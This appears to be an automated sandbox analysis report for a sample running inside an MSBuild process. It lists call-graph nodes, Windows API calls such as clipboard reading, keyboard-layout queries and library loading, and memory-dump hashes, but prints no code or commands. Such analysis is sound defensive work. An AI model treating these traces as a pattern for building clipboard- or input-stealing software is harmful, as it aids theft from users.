105979->105980 105981 76034c0 4 API calls 105979->105981 105982 76034d0 4 API calls 105979->105982 105980->105979 105981->105979 105982->105979 105985 7601e85 105983->105985 105984 7602a59 105984->105984 105985->105984 105986 76034c0 4 API calls 105985->105986 105987 76034d0 4 API calls 105985->105987 105988 76036e8 4 API calls 105985->105988 105986->105985 105987->105985 105988->105985 105990 76034f7 105989->105990 105992 76036e8 4 API calls 105990->105992 105991 760358d 105991->105949 105992->105991 105994 76034cd 105993->105994 105996 76036e8 4 API calls 105994->105996 105995 760358d 105995->105949 105996->105995 105998 7603702 105997->105998 106002 7603738 105998->106002 106011 7603728 105998->106011 105999 760371a 105999->105949 106003 760375f 106002->106003 106005 760384e 106003->106005 106020 760391a 106003->106020 106004 76037c6 106025 7605df9 106004->106025 106031 7606548 106004->106031 106037 7606538 106004->106037 106043 7606611 106004->106043 106005->105999 106012 7603738 106011->106012 106014 760384e 106012->106014 106015 760391a 2 API calls 106012->106015 106013 76037c6 106016 7606611 2 API calls 106013->106016 106017 7606548 2 API calls 106013->106017 106018 7606538 2 API calls 106013->106018 106019 7605df9 2 API calls 106013->106019 106014->105999 106015->106013 106016->106014 106017->106014 106018->106014 106019->106014 106021 7603935 106020->106021 106048 7603b70 106021->106048 106053 7603b80 106021->106053 106022 76039b3 106022->106004 106027 7606544 106025->106027 106026 76065b8 106026->106005 106027->106026 106079 7606708 106027->106079 106083 7606718 106027->106083 106028 760664e 106028->106005 106033 760655a 106031->106033 106032 76065b8 106032->106005 106033->106032 106035 7606708 2 API calls 106033->106035 106036 7606718 2 API calls 106033->106036 106034 760664e 106034->106005 106035->106034 106036->106034 106039 7606544 106037->106039 106038 76065b8 106038->106005 106039->106038 106041 7606708 2 API calls 106039->106041 106042 7606718 2 
API calls 106039->106042 106040 760664e 106040->106005 106041->106040 106042->106040 106044 7606635 106043->106044 106046 7606708 2 API calls 106044->106046 106047 7606718 2 API calls 106044->106047 106045 760664e 106045->106005 106046->106045 106047->106045 106049 7603b80 106048->106049 106058 7603bc8 106049->106058 106062 7603bb8 106049->106062 106050 7603bab 106050->106022 106054 7603b95 106053->106054 106056 7603bc8 2 API calls 106054->106056 106057 7603bb8 2 API calls 106054->106057 106055 7603bab 106055->106022 106056->106055 106057->106055 106059 7603bdd 106058->106059 106066 7603c5a 106059->106066 106063 7603bbd 106062->106063 106065 7603c5a 2 API calls 106063->106065 106064 7603c05 106064->106050 106065->106064 106067 7603c7d 106066->106067 106071 7603ca0 106067->106071 106075 7603cb0 106067->106075 106068 7603c05 106068->106050 106072 7603cb0 106071->106072 106074 7603d68 CreateFileA CreateFileA 106072->106074 106073 7603d15 106073->106068 106074->106073 106076 7603cca 106075->106076 106078 7603d68 CreateFileA CreateFileA 106076->106078 106077 7603d15 106077->106068 106078->106077 106080 7606718 106079->106080 106087 7606808 106080->106087 106084 760673f 106083->106084 106086 7606808 2 API calls 106084->106086 106085 7606781 106085->106028 106086->106085 106088 760682d 106087->106088 106092 7606870 106088->106092 106097 7606860 106088->106097 106093 7606897 106092->106093 106102 7606bcc 106093->106102 106106 7606bd8 106093->106106 106098 7606870 106097->106098 106100 7606bd8 ReadFile 106098->106100 106101 7606bcc ReadFile 106098->106101 106099 7606781 106099->106028 106100->106099 106101->106099 106103 7606bd8 ReadFile 106102->106103 106105 7606c93 106103->106105 106107 7606c2a ReadFile 106106->106107 106109 7606c93 106107->106109 106109->106109 106111 7608b4a 106110->106111 106132 7609030 106111->106132 106136 760a367 106111->106136 106140 760a2aa 106111->106140 106112 7606a9e 106116 7478e90 106112->106116 106124 7478e80 106112->106124 106117 7478eaa 
106116->106117 106144 74794d7 106117->106144 106150 7478f78 106117->106150 106156 7478f88 106117->106156 106162 74794ce 106117->106162 106168 74794cc 106117->106168 106125 7478eaa 106124->106125 106127 74794d7 4 API calls 106125->106127 106128 74794ce 4 API calls 106125->106128 106129 74794cc 4 API calls 106125->106129 106130 7478f78 4 API calls 106125->106130 106131 7478f88 4 API calls 106125->106131 106126 7478ebd 106126->105886 106127->106126 106128->106126 106129->106126 106130->106126 106131->106126 106134 760905d 106132->106134 106133 760a351 106133->106133 106134->106133 106135 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106134->106135 106135->106134 106137 760a351 106136->106137 106138 7609179 106136->106138 106138->106137 106139 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106138->106139 106139->106138 106142 7609179 106140->106142 106141 760a351 106141->106141 106142->106141 106143 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106142->106143 106143->106142 106146 74790c3 106144->106146 106145 74794fa 106145->106145 106146->106145 106174 7479792 106146->106174 106179 74797d0 106146->106179 106184 7479798 106146->106184 106151 7478fb2 106150->106151 106152 74794fa 106151->106152 106153 7479792 4 API calls 106151->106153 106154 74797d0 4 API calls 106151->106154 106155 7479798 4 API calls 106151->106155 106152->106152 106153->106151 106154->106151 106155->106151 106158 7478fb2 106156->106158 106157 74794fa 106157->106157 106158->106157 106159 7479792 4 API calls 106158->106159 106160 74797d0 4 API calls 106158->106160 106161 7479798 4 API calls 106158->106161 106159->106158 106160->106158 106161->106158 106164 74790c3 106162->106164 106163 74794fa 106163->106163 106164->106163 106165 7479792 4 API calls 106164->106165 106166 74797d0 4 API calls 106164->106166 106167 7479798 4 API calls 106164->106167 106165->106164 106166->106164 106167->106164 106170 74790c3 106168->106170 106169 74794fa 106169->106169 106170->106169 106171 7479792 4 API 
calls 106170->106171 106172 74797d0 4 API calls 106170->106172 106173 7479798 4 API calls 106170->106173 106171->106170 106172->106170 106173->106170 106175 7479796 106174->106175 106175->106146 106189 7479817 106175->106189 106194 7479828 106175->106194 106176 747980d 106176->106146 106180 74797d8 106179->106180 106182 7479817 4 API calls 106180->106182 106183 7479828 4 API calls 106180->106183 106181 747980d 106181->106146 106182->106181 106183->106181 106185 74797aa 106184->106185 106185->106146 106187 7479817 4 API calls 106185->106187 106188 7479828 4 API calls 106185->106188 106186 747980d 106186->106146 106187->106186 106188->106186 106190 7479852 106189->106190 106191 74798ce 106190->106191 106199 7278f00 106190->106199 106203 7278ef3 106190->106203 106191->106176 106195 7479852 106194->106195 106196 74798ce 106195->106196 106197 7278ef3 4 API calls 106195->106197 106198 7278f00 4 API calls 106195->106198 106196->106176 106197->106196 106198->106196 106200 7278f27 106199->106200 106202 76036e8 4 API calls 106200->106202 106201 7279002 106201->106191 106202->106201 106204 7278f00 106203->106204 106206 76036e8 4 API calls 106204->106206 106205 7279002 106205->106191 106206->106205 106207 71c0498 106208 71c04bc 106207->106208 106212 71c05e8 106208->106212 106219 71c05f8 106208->106219 106209 71c0513 106213 71c05f8 106212->106213 106226 71c0698 106213->106226 106231 71c06a8 106213->106231 106214 71c063a GetKeyboardLayout 106216 71c0671 106214->106216 106216->106209 106220 71c0631 106219->106220 106224 71c0698 2 API calls 106220->106224 106225 71c06a8 2 API calls 106220->106225 106221 71c063a GetKeyboardLayout 106223 71c0671 106221->106223 106223->106209 106224->106221 106225->106221 106227 71c06b3 106226->106227 106228 71c06c3 106227->106228 106236 71c06f8 OleInitialize 106227->106236 106238 71c06f0 106227->106238 106228->106214 106232 71c06b3 106231->106232 106233 71c06c3 106232->106233 106234 71c06f8 OleInitialize 106232->106234 106235 71c06f0 OleInitialize 
106232->106235 106233->106214 106234->106233 106235->106233 106237 71c075c 106236->106237 106237->106228 106239 71c06f8 OleInitialize 106238->106239 106240 71c075c 106239->106240 106240->106228 106281 71c14a0 106282 71c14a8 106281->106282 106286 71c1577 106282->106286 106292 71c1588 106282->106292 106283 71c14db 106287 71c157b 106286->106287 106289 71c15b9 106287->106289 106298 71c16a0 106287->106298 106303 71c1690 106287->106303 106288 71c15d7 106288->106283 106289->106283 106293 71c15a0 106292->106293 106295 71c15b9 106293->106295 106296 71c1690 2 API calls 106293->106296 106297 71c16a0 2 API calls 106293->106297 106294 71c15d7 106294->106283 106295->106283 106296->106294 106297->106294 106299 71c16b5 106298->106299 106300 71c16db 106299->106300 106308 71c173d 106299->106308 106311 71c1748 106299->106311 106300->106288 106304 71c16a0 106303->106304 106305 71c16db 106304->106305 106306 71c173d OleGetClipboard 106304->106306 106307 71c1748 OleGetClipboard 106304->106307 106305->106288 106306->106304 106307->106304 106309 71c17a2 OleGetClipboard 106308->106309 106310 71c17e2 106309->106310 106310->106310 106312 71c17a2 OleGetClipboard 106311->106312 106313 71c17e2 106312->106313 106241 747cc48 106242 747cdd3 106241->106242 106244 747cc6e 106241->106244 106244->106242 106245 747c4b4 106244->106245 106246 747cec8 PostMessageW 106245->106246 106247 747cf34 106246->106247 106247->106244 106277 7271508 106278 7271550 LoadLibraryW 106277->106278 106279 727154a 106277->106279 106280 727157d 106278->106280 106279->106278 106324 727df58 106325 727df6d 106324->106325 106329 727dfa0 106325->106329 106333 727df90 106325->106333 106326 727df80 106330 727dfc4 106329->106330 106337 727e2c6 106330->106337 106334 727dfc4 106333->106334 106336 727e2c6 2 API calls 106334->106336 106335 727e02a 106335->106326 106336->106335 106338 727e2dd 106337->106338 106342 727e720 106338->106342 106347 727e711 106338->106347 106339 727e02a 106339->106326 106343 727e747 106342->106343 106352 727e7e0 
106343->106352 106356 727e7d9 106343->106356 106344 727e7b4 106344->106339 106348 727e720 106347->106348 106350 727e7e0 LdrLoadDll 106348->106350 106351 727e7d9 LdrLoadDll 106348->106351 106349 727e7b4 106349->106339 106350->106349 106351->106349 106353 727e82b LdrLoadDll 106352->106353 106355 727e86c 106353->106355 106355->106344 106357 727e7e0 LdrLoadDll 106356->106357 106359 727e86c 106357->106359 106359->106344

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 0-543223747
                                                                                                                                                                                                                                                • Opcode ID: 1c34002ee66bb93219c658e6fbdd7c47a6b81d598186a6b6f6e4b2b26fd1c91e
                                                                                                                                                                                                                                                • Instruction ID: 2fd0e40970d20efe402a9774928c806bcf8071df40ec1f91cfef5f51f159a505
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c34002ee66bb93219c658e6fbdd7c47a6b81d598186a6b6f6e4b2b26fd1c91e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 624360B4E012298FDBA5DF69DC84BD9B7F2BB88310F1081EA990DA7354DB315E819F44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: d61667c4cf335d12543249ac269b625c24ee5bf7cda43ce2d7ec092235131d8b
                                                                                                                                                                                                                                                • Instruction ID: 2d995c0f3df2080ccaca34fa784c6d960e96b50f7a49f12641565b1db2eb7f33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d61667c4cf335d12543249ac269b625c24ee5bf7cda43ce2d7ec092235131d8b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF29E30B002189FDB159B64CD54BEEBBB6FF89304F10819AE606AB3A1DB719D45CF61
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: 064ee7ea8bfd635a3db83f19ee236ea9f42ac6d3e23982e15be5db646926ccee
                                                                                                                                                                                                                                                • Instruction ID: 8f360283ed9e3dee322b668b4e4293459de589ef79e59431ed991082cf59bb4f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064ee7ea8bfd635a3db83f19ee236ea9f42ac6d3e23982e15be5db646926ccee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E352C070A08384AFDB519B64DC58FAF7BB6BF86304F15409AE2019B3A2CB75DC40CB61
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(?,?,?,?), ref: 0727E85D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e68e1079022d0299ec44edd18c101e3adaaf5daddb2757e584c1d4991af0f6be
                                                                                                                                                                                                                                                • Instruction ID: 0eb52708bf2e6c4a28d1b851290e7d83a433ef03c7cf82513f9ffd91f0f9f204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e68e1079022d0299ec44edd18c101e3adaaf5daddb2757e584c1d4991af0f6be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1261B4B002059FDB54DF69D894AAEB7F6FF89710B148169D906EB365DB30EC01CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8dabb88e5855b8759aabcbbb9f855f877e8b10476d1fa37449e9dea6a31882aa
                                                                                                                                                                                                                                                • Instruction ID: 84c7321fddf10925e661f56d4b9dd858cc458c7d9fa15228b94de23d43056d81
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dabb88e5855b8759aabcbbb9f855f877e8b10476d1fa37449e9dea6a31882aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4112E2317093409FEB168B74DC58BAB3BB6BF86301F14409AE546DF3A2CAB59C45C722
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b3adac0c798a796814b7e995c0e6f54843a3f1bfb94f21888d1769843407ebbd
                                                                                                                                                                                                                                                • Instruction ID: 6c05ec7bdb5f2cf8d215c1144b65ec27c12957c4a0f30ba7a66816d5579e6852
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3adac0c798a796814b7e995c0e6f54843a3f1bfb94f21888d1769843407ebbd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01029FB4B20246AFCB04EF68D884AADB7F6BF89310F1585A9D805DB361DB70EC45CB51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 332da5965045b39734e08f41a9026556e6a4d7ee353c18ecbbdbe20a5448d34b
                                                                                                                                                                                                                                                • Instruction ID: 80770b508353eb474d1ea9151248e69fbf598b98e460e3e1ba88741bc3cf10cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 332da5965045b39734e08f41a9026556e6a4d7ee353c18ecbbdbe20a5448d34b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85024AB4A10206AFDB15DFA8C854AAEBBF2FF89310F148569E509DB355CB31EC41CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dabdc69df1d087a6921af15b95078f025072b66262a97caa0988b8157146b3b3
                                                                                                                                                                                                                                                • Instruction ID: 2f96352d0451bc7379ac55728212d97f5c70cf7d89a4916f6db644d2bcab6d17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dabdc69df1d087a6921af15b95078f025072b66262a97caa0988b8157146b3b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC126AB4A003059FD715DFA8C584AAABBF2FF88310B1AC599E419DB762C730ED41CB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cfb9d4364be9946d75343a77ce132a9a8d4d4e1a960d9e12ad555446c418ea24
                                                                                                                                                                                                                                                • Instruction ID: d504cb82fd92276c40c67d2b8955de5f2b1beda60676827caa0d1a50d36960e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfb9d4364be9946d75343a77ce132a9a8d4d4e1a960d9e12ad555446c418ea24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42026FB0A10306EFDB25CFA5C880AAEB7F2FF88310F148969E4469B651D775E845CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0bfffd431bb8e028948bd72b77f72a4d06a6c37dbdf69dee642625b7256043e2
                                                                                                                                                                                                                                                • Instruction ID: 1f443ad7039cfd14929076ee83709d3c6e70b8ac3b3d77b3c0c708494a4c315b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bfffd431bb8e028948bd72b77f72a4d06a6c37dbdf69dee642625b7256043e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE026BB5A00705DFDB25CF69C584AAABBF2BF88300F158569E45ADB7A1C734E849CF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 546eab84481b37fcb47f7f0c2e49559b2421e20e0503d1742327702732f356dc
                                                                                                                                                                                                                                                • Instruction ID: 89e5afad8af44dfe78828682356f583bff676fce3dc0b1206bb47861804c4e45
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 546eab84481b37fcb47f7f0c2e49559b2421e20e0503d1742327702732f356dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93F13DB0A00209DFDB08DFA4D884AADBBB2FF89310F158569D846AF395DB35E945CB50

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0153E8FE
• GetCurrentThread.KERNEL32 ref: 0153E93B
• GetCurrentProcess.KERNEL32 ref: 0153E978
• GetCurrentThreadId.KERNEL32 ref: 0153E9D1
Memory Dump Source
• Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 7d4ce7542242f79039396f0b8875dd51468dc39b6d955f71ed03dae327b6758a
• Instruction ID: 309ec802a5ccc7467930071106c4bdcb4ac55fd0d92f24eb61aad6bb07bd8187
• Opcode Fuzzy Hash: 7d4ce7542242f79039396f0b8875dd51468dc39b6d955f71ed03dae327b6758a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 905146B09003498FDB54CFA9D4897EEBBF1FF88314F24845AE419AB2A0D7745944CF65

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E8FE
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0153E93B
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E978
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0153E9D1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 331458f55577d78517a02c87e8c315d94113deebc91c0bb2a976d734f87eca46
                                                                                                                                                                                                                                                • Instruction ID: ef0359fac705d00e6bf7e9435746ecceb88802624dc8ab4fdb9c5d9e8fd46430
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 331458f55577d78517a02c87e8c315d94113deebc91c0bb2a976d734f87eca46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 475145B09002098FEB54DFAAD489BEEBBF1FF88314F208459E419AB390D7749944CF65

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #0$30$c.
                                                                                                                                                                                                                                                • API String ID: 0-3986760010
                                                                                                                                                                                                                                                • Opcode ID: 41b2b6ee82fa42eed305afee00e13d2bd6ba1d3217c174e18977cbf4b99e4a59
                                                                                                                                                                                                                                                • Instruction ID: 40fd2621b19a7376102ecbe297b72e425548ca68c387b45e17768118138a1609
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41b2b6ee82fa42eed305afee00e13d2bd6ba1d3217c174e18977cbf4b99e4a59
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE15CB43106128FC755DF7AC894A2AB7E6AF88A6471581B9E906CF3B5EF70DC01CB50

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2bfa47feb939a53dddb723870e28689520eb7416ab9743fa345687df902b439f
                                                                                                                                                                                                                                                • Instruction ID: 7c2b38e1dd5752d13d99a1547cd5c61b2ba478a7c820d8d164ad1f2f68b75a3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bfa47feb939a53dddb723870e28689520eb7416ab9743fa345687df902b439f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71634AB0A40318AFEB259B50CD55BEEBB76EB88700F1040D9E7097B2D0CA765E85DF58

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 3H$SH
                                                                                                                                                                                                                                                • API String ID: 0-847617511
                                                                                                                                                                                                                                                • Opcode ID: a453dc796e825c4e6caec2b79e8125fe46f78646e4a8919dd2f8e8f9db67f97b
                                                                                                                                                                                                                                                • Instruction ID: 75314493b25ce8f9a91f3e7e60ee5edaea025c82a1a95181d63d01f5e4d51f48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a453dc796e825c4e6caec2b79e8125fe46f78646e4a8919dd2f8e8f9db67f97b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B14161B1B1060AAFCB05DF69D8909DEBBF6EF88710F108169E405AB754DB31EE05CB94
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 3H$SH
                                                                                                                                                                                                                                                • API String ID: 0-847617511
                                                                                                                                                                                                                                                • Opcode ID: 83e5305a890f7b2efd2ef2769c1b4007244b7d3525c93188d0c30e31ab811b23
                                                                                                                                                                                                                                                • Instruction ID: 85ea377de4505fbac55534b8a18ee97a5ede8faf4b859f2f059e462f5482ff94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e5305a890f7b2efd2ef2769c1b4007244b7d3525c93188d0c30e31ab811b23
